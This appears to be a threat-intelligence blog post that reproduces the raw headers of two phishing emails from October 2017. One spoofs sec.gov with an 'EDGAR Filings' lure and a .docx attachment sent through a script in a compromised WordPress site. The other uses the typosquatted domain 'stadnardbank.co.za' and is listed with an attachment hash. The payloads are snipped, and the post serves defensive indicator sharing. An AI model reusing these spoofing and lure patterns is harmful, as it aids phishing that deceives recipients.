X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com
X-AntiAbuse: Original Domain - nu.com
X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
X-AntiAbuse: Sender Address Domain - sec.gov
X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo
X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples
X-CLX-Shades: Junk
X-CLX-Response: <snip>
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
 signatures=0
X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
 suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
 lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
 adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000
 definitions=main-1710110060

This is a multi-part message in MIME format.

--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: multipart/alternative;
boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"

--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/plain; charset=us-ascii

Important information about last changes in EDGAR Filings


--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/html; charset=us-ascii

<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>



--b2_7608a3de5fe6c9bf7df6782a8aa9790f--

--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx

<snip>


--b1_7608a3de5fe6c9bf7df6782a8aa9790f--


for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by
 AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
 15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by
 VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
 15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000
Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com
 (2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com
 (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct
 2017 10:45:14 +0000
Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by
 VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft
 SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend
 Transport; Thu, 12 Oct 2017 10:45:14 +0000
Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by
 DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id
 15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
Received: from <snip> (10.234.178.186) by
 <snip>(10.144.20.58) with Microsoft SMTP
 Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
Received: from <snip> (10.234.174.102) by
 <snip> with Microsoft SMTP Server
 id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190]) by
 Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
 11:43:38 +0100 (CET)
Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1]) by
 rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,
 12 Oct 2017 11:43:36 +0100
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by
 rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
 11:43:36 +0100
Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com
 [188.166.157.242]) by rly14a-eth0.srv.mailcontrol.com (envelope-sender
 <Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id
 v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
 (BST)
Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])
(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
 certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id
 571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>
To: <snip>
Subject: Document
Thread-Topic: Document
Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
Date: Thu, 12 Oct 2017 10:43:35 +0000
Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: <snip>
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
received-spf: Fail (protection.outlook.com: domain of <snip> does
 not designate 147.152.120.47 as permitted sender)
 receiver=protection.outlook.com; client-ip=147.152.120.47;
 helo=<snip>;
x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124
x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
x-ms-publictraffictype: Email
X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
Content-Type: multipart/mixed;
boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"
MIME-Version: 1.0

Related posts
Posted by at No comments:
Subscribe to: Comments (Atom)